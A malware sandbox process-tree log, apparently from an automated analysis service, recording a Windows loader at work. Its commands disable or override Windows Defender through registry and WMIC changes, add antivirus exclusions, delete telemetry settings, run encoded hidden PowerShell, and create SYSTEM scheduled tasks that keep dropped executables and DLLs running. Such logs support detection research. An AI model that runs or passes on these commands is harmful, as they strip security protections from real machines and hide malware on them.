    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:10268
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1016
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:10212
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:11076
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FAROrqqmwDJuC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\FAROrqqmwDJuC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SZbnkDASJEUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\SZbnkDASJEUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TdgVoScrU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\TdgVoScrU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xmhVlMznYVRU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\xmhVlMznYVRU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mrnDKDtAoCXFymVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\mrnDKDtAoCXFymVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fIDQkgvqEeYuFUPy\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\fIDQkgvqEeYuFUPy\" /t REG_DWORD /d 0 /reg:64;"
  2⤵
  PID:5748
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FAROrqqmwDJuC" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:10112
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FAROrqqmwDJuC" /t REG_DWORD /d 0 /reg:32
      4⤵
      PID:9144
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\FAROrqqmwDJuC" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8960
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SZbnkDASJEUn" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:9880
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\SZbnkDASJEUn" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:10952
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TdgVoScrU" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:3004
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TdgVoScrU" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:9896
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2928
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:5608
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xmhVlMznYVRU2" /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:9520
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xmhVlMznYVRU2" /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:8976
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mrnDKDtAoCXFymVB /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:5364
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\mrnDKDtAoCXFymVB /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:10952
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:9576
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:4260
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fIDQkgvqEeYuFUPy /t REG_DWORD /d 0 /reg:32
    3⤵
    PID:2296
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\fIDQkgvqEeYuFUPy /t REG_DWORD /d 0 /reg:64
    3⤵
    PID:10908
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "gdqiMEgHI" /SC once /ST 02:43:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
  2⤵
  - Creates scheduled task(s)
  PID:11220
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "gdqiMEgHI"
  2⤵
  PID:11228
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "gdqiMEgHI"
  2⤵
  PID:6368
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "wovemSUpOFDwVyMam" /SC once /ST 06:21:02 /RU "SYSTEM" /TR "\"C:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\WwbhMxH.exe\" 4h /site_id 668658 /S" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:4900
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "wovemSUpOFDwVyMam"
  2⤵
  PID:10984

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:8116
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:6656
- - C:\Windows\SysWOW64\schtasks.exe
    /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
    3⤵
    - Creates scheduled task(s)
    PID:4012

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:9356

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:9056

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
1⤵
- Process spawned unexpected child process
PID:5704
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
  2⤵
  PID:1428

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:10156
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:9144

C:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\WwbhMxH.exe
C:\Windows\Temp\fIDQkgvqEeYuFUPy\ecFUPPvCYERMhrW\WwbhMxH.exe 4h /site_id 668658 /S
1⤵
PID:6684
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
  2⤵
  PID:11256
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
    3⤵
    PID:1804
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
      4⤵
      PID:8944
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:10028
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:9924
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
    3⤵
    PID:9092
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
      4⤵
      PID:8596
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:6332
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:10032
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"
    3⤵
    PID:6156
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
      4⤵
      PID:7480
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:10348
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:10468
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"
    3⤵
    PID:10664
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
      4⤵
      PID:4012
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:6916
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:1532
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "bEwGusBEGbIeKSSfjR"
  2⤵
  PID:8308
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
  2⤵
  PID:11068
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
    3⤵
    PID:4932
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
  2⤵
  PID:7704
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
    3⤵
    PID:7492
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\TdgVoScrU\Orlvdm.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "xSbgDCImQNdWYmB" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:6440
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "xSbgDCImQNdWYmB2" /F /xml "C:\Program Files (x86)\TdgVoScrU\VvVIPsl.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:408
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "xSbgDCImQNdWYmB"
  2⤵
  PID:9876
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "xSbgDCImQNdWYmB"
  2⤵
  PID:7180
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "FzvIgGdeRLcgbM" /F /xml "C:\Program Files (x86)\xmhVlMznYVRU2\lppuErG.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:8640
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "rRYXbmmYjIvrG2" /F /xml "C:\ProgramData\mrnDKDtAoCXFymVB\ZfVvFqP.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:2536
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "DVpMShOGhTVXDiVCZ2" /F /xml "C:\Program Files (x86)\ewBllfHVNFkRwSdEiCR\HDRnxkY.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:10896
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "LdVsjAprHUXUOtSHAnG2" /F /xml "C:\Program Files (x86)\FAROrqqmwDJuC\tIvRXbx.xml" /RU "SYSTEM"
  2⤵
  - Creates scheduled task(s)
  PID:9416
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "lDWDrPZYJQBuPmKYQ" /SC once /ST 03:40:58 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\fIDQkgvqEeYuFUPy\KNNoyvlM\VgIzFaA.dll\",#1 /site_id 668658" /V1 /F
  2⤵
  - Creates scheduled task(s)
  PID:9072
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "lDWDrPZYJQBuPmKYQ"
  2⤵
  PID:10124
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /CREATE /TN "spuYsxJXpqhQ" /SC once /ST 10:06:58 /F /RU "Admin" /TR "\"C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\AySbEJbO\UZKWBwl.exe\" RA /S"
  2⤵
  - Creates scheduled task(s)
  PID:9828
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /run /I /tn "spuYsxJXpqhQ"
  2⤵
  PID:6396
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /END /TN "spuYsxJXpqhQ"
  2⤵
  PID:10976
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "spuYsxJXpqhQ"
  2⤵
  PID:5152
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
  2⤵
  PID:4160
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
    3⤵
    PID:8644
- C:\Windows\SysWOW64\cmd.exe
  cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
  2⤵
  PID:1408
- - C:\Windows\SysWOW64\reg.exe
    REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
    3⤵
    PID:8960
- C:\Windows\SysWOW64\schtasks.exe
  schtasks /DELETE /F /TN "wovemSUpOFDwVyMam"
  2⤵
  PID:8388

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:6440
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:11076

\??\c:\windows\system32\rundll32.EXE
c:\windows\system32\rundll32.EXE "C:\Windows\Temp\fIDQkgvqEeYuFUPy\KNNoyvlM\VgIzFaA.dll",#1 /site_id 668658
1⤵
PID:7908
- C:\Windows\SysWOW64\rundll32.exe
  c:\windows\system32\rundll32.EXE "C:\Windows\Temp\fIDQkgvqEeYuFUPy\KNNoyvlM\VgIzFaA.dll",#1 /site_id 668658
  2⤵
  PID:7080
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /DELETE /F /TN "lDWDrPZYJQBuPmKYQ"
    3⤵
    PID:3264

C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\AySbEJbO\UZKWBwl.exe
C:\Users\Admin\AppData\Local\Temp\PZdhpCrZMxgBhjWOo\AySbEJbO\UZKWBwl.exe RA /S
1⤵
PID:9968
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &
  2⤵
  PID:9904
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"
    3⤵
    PID:184
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
      4⤵
      PID:9520
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:7592
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:11248
- - C:\Windows\SysWOW64\forfiles.exe
    forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"
    3⤵
    PID:9940
  - - C:\Windows\SysWOW64\cmd.exe
      /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
      4⤵
      PID:10844
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        5⤵
        
        PID:9576
      - C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True
        6⤵
        
        PID:10116

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:5608
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:4664

C:\Users\Admin\AppData\Roaming\facjjbr
C:\Users\Admin\AppData\Roaming\facjjbr
1⤵
PID:5796
- C:\Users\Admin\AppData\Roaming\facjjbr
  C:\Users\Admin\AppData\Roaming\facjjbr
  2⤵
  PID:9632

C:\Users\Admin\AppData\Roaming\cfcjjbr
C:\Users\Admin\AppData\Roaming\cfcjjbr
1⤵
PID:9680

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
PID:2172

C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
1⤵
PID:8188
- C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
  2⤵
  PID:1644

C:\Users\Admin\AppData\Local\Temp\9611.exe
C:\Users\Admin\AppData\Local\Temp\9611.exe
1⤵
